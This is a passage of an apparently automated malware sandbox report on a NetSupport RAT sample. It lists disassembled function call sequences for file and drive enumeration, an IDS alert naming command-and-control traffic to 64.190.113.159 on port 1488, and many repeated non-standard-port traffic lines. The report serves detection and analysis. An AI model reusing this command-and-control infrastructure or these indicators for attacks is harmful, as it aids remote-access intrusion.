                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5B0B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6C5B0B33
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5AC775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,6_2_6C5AC775
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5B0702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6C5B0702
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C577C6D _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6C577C6D
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5AFD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6C5AFD86
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5ADF35 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,6_2_6C5ADF35
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5AF8B5 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6C5AF8B5
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5ADA38 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_seterrormode,SetErrorMode,6_2_6C5ADA38
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5AF40B _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6C5AF40B
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C5AD4FF _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,6_2_6C5AD4FF
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE10302E70 memset,PyList_New,SetErrorMode,PyArg_ParseTuple,PyObject_IsTrue,PyEval_SaveThread,GetLogicalDriveStringsA,PyEval_RestoreThread,PyErr_SetFromWindowsErr,SetErrorMode,PyEval_SaveThread,GetDriveTypeA,PyEval_RestoreThread,GetVolumeInformationA,strcat_s,SetLastError,strcat_s,strcat_s,strcat_s,FindFirstVolumeMountPointA,strcpy_s,strcat_s,Py_BuildValue,PyList_Append,_Py_Dealloc,FindNextVolumeMountPointA,FindVolumeMountPointClose,strcat_s,strcat_s,Py_BuildValue,PyList_Append,_Py_Dealloc,strchr,SetErrorMode,FindVolumeMountPointClose,SetErrorMode,_Py_Dealloc,_Py_Dealloc,1_2_00007FFE10302E70
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 4x nop then add byte ptr [edi], dh6_2_6C568468
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 4x nop then push esi6_2_6C55F640

                                Networking

                                barindex
                                Suricata IDS alerts for network traffic
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.4:49733 -> 64.190.113.159:1488
                                Uses known network protocols on non-standard ports
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1488 -> 49733
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1488 -> 49733
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
